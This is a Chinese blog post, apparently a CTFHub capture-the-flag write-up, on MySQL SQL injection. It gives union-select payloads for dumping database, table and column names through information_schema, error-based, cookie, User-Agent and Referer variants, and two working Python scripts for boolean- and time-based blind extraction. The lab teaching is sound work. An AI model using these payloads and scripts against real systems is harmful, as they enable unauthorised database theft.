mysql 爆表名_CTFHub-技能树-SQL注入

最新推荐文章于 2022-03-27 20:29:16 发布
最新推荐文章于 2022-03-27 20:29:16 发布
阅读量735 收藏 1
点赞数 1
文章标签: mysql 爆表名
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39968436/article/details/113557655
版权

整数型注入

不需考虑任何过滤,由于始终只返回第一行的信息,所以使用LIMIT来查看其他行的返回。

常规注入流程:爆数据库名->爆表名->爆字段名->使用union select获得想要知道的对应字段的内容。

爆数据库名

a5f47e991566

1 union select database(),1 limit 1,2

数据库为sqli

爆表名

a5f47e991566

通过更改limit的值得到sqli数据库中可能藏有flag的表名

1 union select table_name,1 from information_schema.tables where table_schema='sqli' limit 2,3

爆字段名

a5f47e991566

通过更改limit的值得到flag表可能藏有flag的字段名

1 union select column_name,1 from information_schema.columns where table_schema='sqli' and table_name='flag' limit 1,2

对应字段的内容

a5f47e991566

得到flag,payload:

1 union select flag,1 from flag limit 1,2

字符型注入

同上题目,但是为字符型,需考虑单引号,在1后加单引号’将字符型的引号闭合后进行注入语句构造

a5f47e991566

payload:

1' union select flag,1 from flag limit 1,2;#

报错注入

1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

布尔盲注

首先要知道mysql中if的用法

a5f47e991566

?id=if(爆破库名表名字段名,1,(select table_name from information_schema.tables))

当expr1正确时,返回expr2(也就是1),回显query_success,当expr1错误时,返回expr3(也就是select table_name from information_schema.tables的结果,由于该查询结果返回不止一行,所以回显query_error),通过这里可以爆出所有需要信息

a5f47e991566

a5f47e991566

大佬py脚本:

import requests

import time

urlOPEN = 'http://challenge-你自己环境的连接.sandbox.ctfhub.com:10080/?id='

starOperatorTime = []

mark = 'query_success'

def database_name():

name = ''

for j in range(1,9):

for i in 'sqcwertyuioplkjhgfdazxvbnm':

url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)

# print(url+'%23')

r = requests.get(url)

if mark in r.text:

name = name+i

print(name)

break

print('database_name:',name)

def table_name():

list = []

for k in range(0,4):

name=''

for j in range(1,9):

for i in 'sqcwertyuioplkjhgfdazxvbnm':

url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)

# print(url+'%23')

r = requests.get(url)

if mark in r.text:

name = name+i

break

list.append(name)

print('table_name:',list)

#start = time.time()

table_name()

#stop = time.time()

#starOperatorTime.append(stop-start)

#print("所用的平均时间: " + str(sum(starOperatorTime)/100))

def column_name():

list = []

for k in range(0,3): #判断表里最多有4个字段

name=''

for j in range(1,9): #判断一个 字段名最多有9个字符组成

for i in 'sqcwertyuioplkjhgfdazxvbnm':

url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)

r=requests.get(url)

if mark in r.text:

name=name+i

break

list.append(name)

print ('column_name:',list)

def get_data():

name=''

for j in range(1,50): #判断一个值最多有51个字符组成

for i in range(48,126):

url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)

r=requests.get(url)

if mark in r.text:

name=name+chr(i)

print(name)

break

print ('value:',name)

if __name__ == '__main__':

database_name()

column_name()

get_data()

时间盲注

尝试

if((substr(database(),1,1)='s'),sleep(1),1)

#! /usr/bin/env python

# _*_ coding:utf-8 _*_

import requests

import sys

import time

session=requests.session()

url = "http://challenge-e53e5a329b0199fa.sandbox.ctfhub.com:10080/?id="

name = ""

for k in range(1,10):

for i in range(1,10):

#print(i)

for j in range(31,128):

j = (128+31) -j

str_ascii=chr(j)

#数据库名

payolad = "if(substr(database(),%s,1) = '%s',sleep(1),1)"%(str(i),str(str_ascii))

#表名

#payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',sleep(1),1)" %(k,i,str(str_ascii))

#字段名

#payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" %(i,str(str_ascii))

start_time=time.time()

str_get = session.get(url=url + payolad)

end_time = time.time()

t = end_time - start_time

if t > 1:

if str_ascii == "+":

sys.exit()

else:

name+=str_ascii

break

print(name)

#查询字段内容

for i in range(1,50):

#print(i)

for j in range(31,128):

j = (128+31) -j

str_ascii=chr(j)

payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',sleep(1),1)" %(i,str_ascii)

start_time = time.time()

str_get = session.get(url=url + payolad)

end_time = time.time()

t = end_time - start_time

if t > 1:

if str_ascii == "+":

sys.exit()

else:

name += str_ascii

break

print(name)

MySQL结构

没搞懂这题考啥。。爆出表名和字段名后直接用union select没有回显,所以直接sqlmap

a5f47e991566

a5f47e991566

Cookie注入

和第一个整数型注入一摸一样,只是注入地方变成了cookie的位置

UA注入

也就是User-Agent注入

同上题,只是注入位置变为了User-Agent

a5f47e991566

image.png

Refer注入

regerer头含义:

a5f47e991566

在包中加入referer头即可完成注入

a5f47e991566

过滤空格

可以使用最简单的/**/代替空格,题目只是给了方向,有更多空格绕过的方式有待学习

weixin_39968436
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入:爆破库、表、字段
qi_SJQ_的博客
11-03 4150
1.MySQL注入:
SQl注入学习
weixin_42451330的博客
06-08 945
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
SQL注入5-6(报错注入)
m0_59082970的博客
03-27 4221
目录 一.判断闭合方式 二.爆库名 三.爆表名 四.爆列名 五.爆字段 一.判断闭合方式 Less-5/?id=1\ 二.爆库名 Less-5/?id=1' and extractvalue(1,concat(0x7e,databse(),0x7e))--+ 三.爆表名 Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from informatio...
mysql注入爆表_Mysql手工注入
weixin_33548183的博客
02-08 297
整理一下手工注入笔记,以sqli-labs环境为例。1.Mysql手工union联合查询注入输入单引号,页面报错。根据报错信息显示,这是个字符型的注入,后台的查询应该是select xxx from xxx where id='1'。下一步,我们用order by 来爆列。(ORDER BY 语句用于对结果集进行排序。)当order by 为3时,有数据返回,为4时报错,说明有3行数据。然后,我们...
注入sql攻击,爆库,爆表,爆字段
zzzgd_666的博客
07-07 1257
注入sql攻击,爆库,爆表,爆字段函数注意点防范于未然, 了解它,然后避免它.用好#预编译 研究sql注入攻击的方式, 自己有空写个demo试下效果 函数 除了这个函数还有其他几个函数可以实现注入sql攻击的效果 updatexml(a,b,c) 参数a: xml文档名字 参数b: xpath表达式 参数c: 替换的值 原理就是将b替换成concat函数, concat函数里又包含sql, mysq基于函数的运算法则, 应该是先执行里面的sql, 然后将查询到的值, 执行concat函数, 得到最终的字符串
关于sql注入暴库爆表爆字段
weixin_48421613的博客
07-21 3640
首先先介绍一下数据库默认库information_schema中的一些重要表 information中有三个重要的表,我们可以通过这些表得道自己想要的库名字、表名字、字段名字 1)information_schema.schemata schemata 表中重要字段为 schema_name ,此字段中涵盖数据库存在的所有的库名字,我们可以通过一些查询语句得知我们想要的数据库都有哪些(database()只可以得知当前数据库我们就不进行讨论了) 例: ?id=-1 union select 1,
mysql爆表名_Mysql 通过information_schema爆库,爆表,爆字段
weixin_39534121的博客
01-19 310
MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、 列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。若要从这些视图中检索信息,请指定完全合格的 INFORMATION_SCHEMAview_name 名称。列名数据类型描述TABLE_CATALOGnvarchar(128)表限定符。TABLE_SCHEMAnva...
学习SQL注入基础笔记
Ruoten的博客
03-06 3898
mysql注入必懂的知识点 (1)在mysql5.0版本以上中,存在一个自带数据库名information_schema自带 记录所有数据库名 表名 列名 (2)table_schema:数据库名 (3)group_concat(table_name):查询所有的表 (4)table_name:表名 (5)column_name:字段名 (6)数据库中符号“.”代表下一级,如user.user表示数据库user下的user表 (7)information_schema.tables...
sql 注入及爆表与字段
Vi的专栏
05-22 8254
http://www.cchacker.com/main 转载请保留来源与版权信息,尊重作者劳动。 一、SQL 脚本注入攻击前奏 注入点的寻找、区分、与判断 手工寻找检测注入点 http://www.target.com/article.asp?id=1ASP 注入 http://www.target.com/article.php?id=1 PHP 注入
mysql -- 手工注入
Nixawk
04-22 6459
------------------[index1.php源码]------------------ ID: ------------------[index2.php源码]------------------ $con = mysql_connect("localhost","root","fuckyou"); mysql_select_db("mytestdb"
SQL注入漏洞---表(列)名的暴力破解
Ethan024的博客
04-04 634
实验平台: 皮卡丘靶场—字符型注入 payload: kobe’ and exists(select * from aa)# (1)将kobe’进行查询; (2)将and作为运算符; (3)猜测表aa是否存在,该表名是个字典。若表名存在,表达式为真;否则表达式为假。 实验步骤: 输入payload kobe’ and exists(select * from aa)#查看查看报错信息: 通过burpsuite将数据包抓下来,并且发送到intruder里面: 这里要暴力破解的对象是表名aa,因此在此处添
常见的一些SQL注入漏洞类型
Loser5的博客
03-14 6042
刚接触SQL注入不久,整理了一些常见的漏洞类型和相关漏洞的演示过程。
SQL注入总结
CODING...
01-11 2764
最近一直在研究SQL注入攻击,现在对SQL注入进行一个总结: SQL注入的原理就不在这里赘述了,直接从攻击技巧开始: 1.手工注入猜解流程: 假设我们现在以http://ctf5.shiyanbar.com/8/index.php?id=1这个链接为例子,已知它的id是一个注入点: 我们可以大概知道它的SQL语句大概是这么写的:SELECT ID,CONTENT FROM TABLE WH
sql注入登陆(菜鸟级)
wangzhen199009的专栏
05-19 5369
比如 我们登陆的时候身份验证,一般用如下代码 private void Login_Click(object sender, EventArgs e) { string id=this.txt_id.Text; string pwd=this.txt_pwd.Text; //string query_Sql=
【Kali Web渗透测试】手动漏洞挖掘—SQL注入 猜测数据库列名、表名、库名、字段内容
f45646654的博客
04-12 3461
1. 列名、表名、库名' and user is null--+' and table.user is null--+' and db.table.user is null--+用burp截获http GET请求,发送到repeater,变量加$, load字典(字典可从kali中获取(find / -name *column*.txt))' and (select count(*) from t...
mysql注入语句 爆表_mysql注入语句
weixin_42361635的博客
02-04 833
一、sql注入语句爆破所有数据库:(select group_concat(schema_name) from information_schema.schemata)获取数据库所有表:(select group_concat(table_name) from information_schema.tables where table_schema='mysql')获取所有列名:(select ...
SQL注入--表的猜解
写下些记录
02-08 5097
步骤 表名—>列名—>列长度—>具体值 例如:注入点 http://www.XX.com/index.asp?id=1 猜解表名:http://www.XX.com/index.asp?id=1 and exists select * from 猜测的表名 猜解列名:http://www.XX.com/index.asp?id=1 and exists selec...
震惊!sql注入 的格式居然被他爆了出来,按照这个格式,新手入侵网站变成可能?!(作者自用格式)
qq_42777804的博客
07-26 832
联合查询 判断是否存在注入 id=1’ 异常 id=1’ and 1=1%23 正确 id=1’ and 1=2%23 错误 说明存在单引号字符型SQL注入 都错误的话,可以尝试数字型,双引号,括号型 2.求列数 id = 1 order by 4%23 正常 Id = 1 order by 5%23异常 说明有4列 格式 id = 1 order by 数字%23 3.求...
【Burp suite】结合SQL注入暴力获取表名、列名等信息
weixin_43526443的博客
04-04 2944
一、前提了解 1.分析        以往的单纯SQL注入获取MySql数据库表名、列名等,均基于其information_schema库获取,若后台开发者使用非MySql数据库或屏蔽information_schema,则无法获取数据库表名、列表等信息。 2.解决      &...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值